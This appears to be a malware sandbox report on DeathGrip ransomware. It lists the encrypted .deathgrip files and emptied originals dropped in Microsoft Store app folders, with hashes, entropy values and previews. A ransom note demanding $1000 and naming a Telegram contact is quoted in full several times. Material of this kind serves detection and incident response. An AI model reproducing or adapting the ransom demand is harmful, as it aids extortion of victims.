                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\Internet Explorer\DOMStore\YRTPYF2G\www.office[1].xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.105948244179686
                                                          Encrypted:false
                                                          SSDEEP:6:vRsCxA9dlRngimq0SqeNlYRWXuWJCiSNeHG5E4Qwt+8GDFNru2UFIC:vHYdlp10SrL/JCiSNtalwcXWdX
                                                          MD5:9A9C2E8F364DD323A4EECBDF66B9D9C4
                                                          SHA1:24542B7AB5A6652631117D60479D06166F8E870E
                                                          SHA-256:3398952AF502C7302FD893F53D87FE74D14393BD801C405A215FE951C1FA4288
                                                          SHA-512:F5677FB96853733D1B0283F874F8807273F556B071212FF1D1E6135FB48024D62194F973F88A2E0796BB7DD423436655F9149A9B8CE415C6F5C425A81EBDE961
                                                          Malicious:false
                                                          Preview:........[........k...!YDl+k1fMw1arftUZM8PVpkkyieXmCz10Kco51WHrYZw0xvhjj50UkqBo2j59wT56EjYoQy+DfsXYLB4gEwufLFww7IbVTjKE9MduZDL/BrjHZ+GTAWVlDutHRLv1kHw07VK4VXnE1TisDn/ZwMawnLIP86ZWU9jzP+fRI0x59+331W0rvchCKm5riYaPWLITzYalldCW9z1P/TVz+PRqy3f4v9IPt/Wg7vqI7NXA4lPT2B4qnNRQJER2xgqCRkvOfzmxtbEEltqBjHdn9z4SDUuMQcft23EZjzWyD/i5HoKR5d8UCop3DPj3S/r0J03LEmanQm0ylFZbzLUvlIGG2Hg==

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\Internet Explorer\DOMStore\container.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\Internet Explorer\DOMStore\container.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.1131498565772695
                                                          Encrypted:false
                                                          SSDEEP:6:tLxiAcvEzjvgTDRxegxtrp7qzHQtWBXW+qSw9wC3T6TUu6P8IDOv7AFn:bdc8zTsDSM7qzDW1Sywq6TM/UQ
                                                          MD5:6EB267A1CB4018E23089E2A07FB98174
                                                          SHA1:E702D391866DDC0ACAB3320B3DD1271D4BE811F1
                                                          SHA-256:C65DD8DC659EC3DC44AF320A73F0B5206E421A31AC9B6456EB62E6BD3C598495
                                                          SHA-512:80D477DB45999B57BE15AFBC3AEAFD498232F3EC38E36B907FD38DDD386CF35E9623BDD9F968D01509725611BD83E13282ED6E42310B00DB76D4706CFAE06A15
                                                          Malicious:false
                                                          Preview:.........V...I^.0Y..@..gxO4JNfSgGvoV2woXz7CMcg2XzAVF/rZcV+0pTwyiWNHUuVSBECKkZ71q03lOjVmJWLQUKedDve+airxfcLasJYC1JbCKrygLhZAHkWSwBrTIXmo5uQy+8kI00lgQko9e/v15Ty9E/GJOCJZl1kuoVWomW1B2uPxDa3b0yp8sR61al8dh5ZrS7rD0pmr15JpLWjU3aO3jM31ri1hsbbRGWc6KHnHn72pT8dwnqnEMf0deC9VXCgFdflPFsRm8HL8kTT2cU1QJx9DVfHSC0Rvxjr0GlZtZnqXjX3tqZy3fldqw/3wGO+HtjmzU6kAi0fO+T8JpXWoCcr0zDkwkVVNAg==

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\Internet Explorer\DOMStore\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):107552
                                                          Entropy (8bit):7.998137822413746
                                                          Encrypted:true
                                                          SSDEEP:3072:iWG+DsIUV9OYaTRUf2jLifzJmKnuOz6KFoSXjSpeAP5:zG6c9uTWf2jLMIKuqvjAB
                                                          MD5:B0EAED530B5A69980304ADEAC7FF6FFA
                                                          SHA1:3194B40FD7856374723E15B8676F7589DDA96B25
                                                          SHA-256:71C923E4C83417FD55C83A0D63919DD2F395A4C64461E5C1C86A49C978363D26
                                                          SHA-512:689991988752E02D40060CD9479E8F9129D4DA0826510871B36F5D04E53780034FE675F10AE32B67B1D46B473123991D9CFDEA31334D43188122D56B70917E5D
                                                          Malicious:true
                                                          Preview:.........k....?.0,........t.A..,.<...OaP.0..lF........Fn..R*...td.WE.+B....w....<..2..`T....Q..;..F...@.>...]..f.65/..mG.!....E..2.+.G.Y...^_..hi.Zsy.[.'..SvC9.X....T|....T%..._.8..... ... {...&.r.E........=.-...>..R.(a....W..j..Y.T...V...E]....8.O...\...h..1.(r.^..U.m....Z..u.J....,..&d....... .\6.....y=.=.[.f:....!...v..S..y....L.*..Q.#c.L.....2.4...._>.m.\....._.........q$W..N..x3wt.{.......c.!..e.....B.o."..^.s..~...~.U...g.'#q[...EK$.<....n.V.6..D...t!!J.%....A.8f. ..rX...O.._\y..N..r-M!H.<.....6A.AE.........1[.)>.z.....[.mq.N~?i.hH.,....b~f.F,..~.`8D..$Bj.Te......K...[.F..qCqT.k..V.@.rd....n...(.....R:.{.t........V.F..^....c..9N*....O.yr*....(...r...1.'6..........S.Eh.&..x*.......".!$..#....&,.k|......uzqx2+.j3.....Hy.w.._...........=..6..@%...T..1.....]..N.......^..~...0%..}...P.r,.i..z...I.T...a&........&.H...j.....v9..uF....F....@........_..!.r..3;.(..U..B.V.e5.?....F...<,."n;...{...0q5...!.M0.13...k......k.I|5.."#6....#.a.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.9777104827243805
                                                          Encrypted:false
                                                          SSDEEP:192:A+QdWucZL4TXauqwE9wIOavW5u8LGqTTwCAoRkViiS/fN/hr:DdZgLqz9w0e5rLLU7dViF/fr
                                                          MD5:5AC114F25CD1DE64941AA284635B71D8
                                                          SHA1:D990A5384D18610ADA8FD511411B13D62FE454CC
                                                          SHA-256:E4F1A02BDB7FE9A3713405A0B12833119344BFB541892B376213F8230BA07763
                                                          SHA-512:D3A2CDF0D00211F4A7ACB7F0B63334791D5346E91865382B4EC7E71920065CD010C06C29B8DF64DAF238409F3E2CD517C470A838B30900DEA25660542BD593C7
                                                          Malicious:false
                                                          Preview:........g......^.....W........V...Ly...\8.FUE.Oc...S....b...:..........bn..4.:e.k..Tt...;........e=\.v.yx.o9....Aq;JF....^.w..a..>..#....Uh.........0+4...7Gh....K4...M.....y0..biu..U.8..).Hl..P...$...nW.......N.wJXd...".X..^..S...2.-.<.$.1..OhN..h2.W..ou....M.v.p....V.......]ov.(...tw.aLoi.2...l..#.W.a.f...k{T.IM..z,l.0.H....9...mB.!.K?.y=.B.C.L.inD2._\qn@Ca....Vb.I...r..,'%..........h......ny..N.M.~...69.P..K_q...^..-..;B[19."$cd...c..n.~.R..6o..............8{H.@..x...6.....M.x.w...`.......~..`1.}.W...2....M.:.o.[C.B...j..|l.....R..${X.......1..H....U.R..G..s.|4.w..].l..[.p.....*J.......2`..`.zD...7-......8.}F.c..{.ZAz..q.R..........i>z.w.'..8&.`Qr....e.....%...k....rr&........U.4Zd.E.. Qd..X.]6i.J.L.:.BBS.#.=Z..Gz|...T..>F...t.+....S...|G...xhw...r..t..{m.. g.~/......E<...y.. .`..z..a..).,...)..i.....:.y,.i.6..W....X....~ ..D.x....@^LW...}.....r]^.....-p.Y..k....Jv....ne.{.0..\t.=....P.. ..)..;..1..........|.../.?k..s...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.973195446877496
                                                          Encrypted:false
                                                          SSDEEP:192:QU87U8zbuiHFfuoJ5OnCzFR1IEa17DGp2RY+059uu70KpHZFKLX:QUghXz5ueOnCxR+EiGp2RjouuICHZFKT
                                                          MD5:1B7E29E42461FE3A28E77E5D47BCB1C7
                                                          SHA1:0F15EF425E6F862A84209C5215B274541A3F4E90
                                                          SHA-256:9B0C40668F1FAF732025B4FF6462A01E797212B75D58F6993DB6AC8CB692D501
                                                          SHA-512:F2585868751322B7BB0CF047B0CA57765737E7298974A2037B4F848D78ACD228832DAD98CDEA5814790547F811CF38E80161DFB4E42426E595C580715EFF40BA
                                                          Malicious:false
                                                          Preview:..........Y(N....?..T...;......Ow....]1.o7I...*..-.z..d.KN...'.....H.8.'.....y...i..Y......^.0j....I.H.w.q....A....G.;.....g$0....N......).J.I...0....!3..."...f..".d....5..>...r..\.B.<.7#n.......x.)....Pc.#{.w.G.P.+...$xxk.2.%.A|O=..@r. ........Zq.5/2H.E........C.x.?+u...)..Q..s..&+-.I.....6...h..Y.Xh.,..Pk......K..,.I=...wM7.7-.T..K;v....ef....R...1Q.=....%ds:X...AH...I?.J".v\P{5..4..)..G'...7.;{#.$...:.gwf..s.Z.v..|".p......4.go9.A....E)...Y..S.6wW.{..I...\G...c.a9.a......w..b..,+..&. ...k+.E...:wG....Yv....]w._).1...+.;.R.=..8p.....:.r.{[\.!W?=W...n..K....#4O.w....K.c....0..,.2...n\qC..pT.nh&....h........v.K...`........J]r...8..p...G....Vs..6..a.c..3.^A].......}:...so...1.HB..(..{R..[.Z..;....:...h<.....:.F$..$..1w....U..g..RXN...y. .%...q.[O.i=l;.q+..e......eTAi...iQL.(..,4..1....nCX.x.O..'].........&....Pe...$0K.'..EE.......L...=..)......BiCy..8...smy.a.&..&.d~.j.b..2..I.6...4.F....)..r..9.1.s-6..._...R_..r....T.....d.].....TU.mQ;|[V....%.x.F...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.971686414647348
                                                          Encrypted:false
                                                          SSDEEP:192:UnC862uaAaoqD0dlSy9JWAAKEv6bOtDJBTdS2bASsGN1ZXgX:UViafD+HWAAKYiOtDvG54K
                                                          MD5:3FAC41EA1FD6DE5E514230A5B1996C4D
                                                          SHA1:BDA1D2CA3ED55E67866581EB0B3AD83A8712C665
                                                          SHA-256:4D7B72CF537495598DA8E2288E0567EA360D6CD58D2ECFC296F25D35712C514E
                                                          SHA-512:EA059FC3982E8C993F07F4BBE5A9BF8A8F678670AB5892AFE2FA8E2CE84E1B1E102BBE941B3E8B6EC9A41F7FA143AE71EE7A3C30DD56B79A17581F4B338306D5
                                                          Malicious:false
                                                          Preview:..........W.......*..2!..DD.x.4..Uf~=....&...k.{..+q..dh...PG..U.2.......;.....p^...-...RC42g.i..p........y+..w...$...JA.Q.b.d.,....=3.W.....eQ..l..{.. ....].Z....r..de^}...A...).AyE.<.?cJ...X.]..XG..z......k..S...APuj......n.....g@.i,8t.h...6..F..#.fJ.T@.V.\8.Zo,.A.......X.+PSu:.1..J....'.:...5/...@...|.7^c,...mrD....c<.i.c.p].;+..#..F...c..-]\..1.vrRe..lMj....k+...u4.C......[...D>..57;.q"#.X{...LQ.C.).._.5.7.s;.@.4a.C.\.(..\N.*.]F......Rv.Z.EE.{N,..D........n*..c7..h......).^...H...Kqo.'u%....,..t.v..y.T.4...T.w.+.U..^....e.a....`s..C.59 ..M....y..\3y...o,Y.bj..bE.,......p.....u.K.d.b8..W.>.Q2,.6.S...f...8I./3..a....M#....$B.)L.Z......k..eh....z..L....F.g.K4x..J.`./*a.|.....F0.p.4.....-V77....D.......c..~P.kEe._qv.."...!dY/G..[...\%..=]*.b..b.....U....2..z"..i.lf..^...A....3.Z..q.K..tq......*.).K.....7.bW..<..([q..... E........V...j;A.. ..../@d*....g.w..I...D..H..u.N3..Q..{.$S.....N.........W`Z.`....dX'g%a.7...k...[.w..n.L...)..........

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.978221564099286
                                                          Encrypted:false
                                                          SSDEEP:192:N+NGTy6d0IqSMN5gKun9hlxORTxHdOlKL4hteXX:wwTyXYMcKIv0OlA4/eXX
                                                          MD5:1E1AC62BCEC2A94DA04AB6DB0A3DF402
                                                          SHA1:F34BC5E880D2E969BD30301FF55EA965926654FA
                                                          SHA-256:11186EBB6328E01A7158E7F78D347F566C6D2C887421EAA39A0C87783107A71E
                                                          SHA-512:A98CC1C9891176B95727E9C82EA34712CBD7305CC440C9CE0A47C3DD0D2A8A3BD1B55260A42FF4877418EEAB9F9B8B4AAC056FF0211E56EA8BE7F65244DF82F0
                                                          Malicious:false
                                                          Preview:...............5R...!...h...3...@.|d;.h.{.#?afE%..I.VK=.EU.(.9.B.V.k<=;l N.I........{..y.%...g./ICI|..7. ..g.@..Xe..H..+.9?....o..Bl..&|....Vc....u.8-.Odu.I.Z....4..c.Q:Am....F.%e...M..!....).w2*A..h.....C-..[.{U.""...e.^...#W.F..`.^"_..6...../$0....i'+..7..~...A..,k.I...-^n..F~......:gRLDh.=....Div?..L..*...h...\..g;..t..!=.gt..........fC...3...?...2.-7...._=...P|.WL...f_.0.....T..N\q.M.=.T..Nh..))&Z.vKO.0..J...Z.f....../U..zr....d.I%9.....i.`.i.A..k.........G.k...1....<...m..s.......q..d._{..U....uZi....P.M.B%....J.v.k..V.@t...v..&..|....Y.$..!s.!..j...K..&..:-..Xw.}T..w..yfLg....=...]..b........0.i[...9....[H......p.9..b.....@jH...6.Y.LN.3oJP<..r;....).|.RL....S....&.I...VR..oeG.[,..KW...`b...u..n.L.#.o...w.4hu...}$..m..[.?`..>.n9-..c..7.......C...w..L..fxw.......CJ..;vH......=....Q........O@.l~...5..4.../......~...3v.1....oX.Wl..R.}..x.....R...W.....~......d7...q...Q..L.^G........W......0......l.....P../...pa.......C.,'.!>..gF..C.......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.974815270725497
                                                          Encrypted:false
                                                          SSDEEP:192:Th5P16Ew/i1ALReU4vtxw5DvPxitfCb/dRnOw5cjFc+LASbbIjV6E:716ExgR3DvpSab3O4+hG6E
                                                          MD5:7951582CD897420020D6FE4D9060A964
                                                          SHA1:F9C188D5740378237EF4B482666D86BBFA4B9540
                                                          SHA-256:3A7B4C2700B3E9C347CD937CD94293B110B0F45526FC690237F54D76DE3CA12E
                                                          SHA-512:AEA312C78B454A9F0B1DC919781D7A88678B884DB671F418604D62B20A3A810C1F88E4A4FCFD6087CBFF89104E3D990E1C5AC415958512F9E1A76548F2789203
                                                          Malicious:false
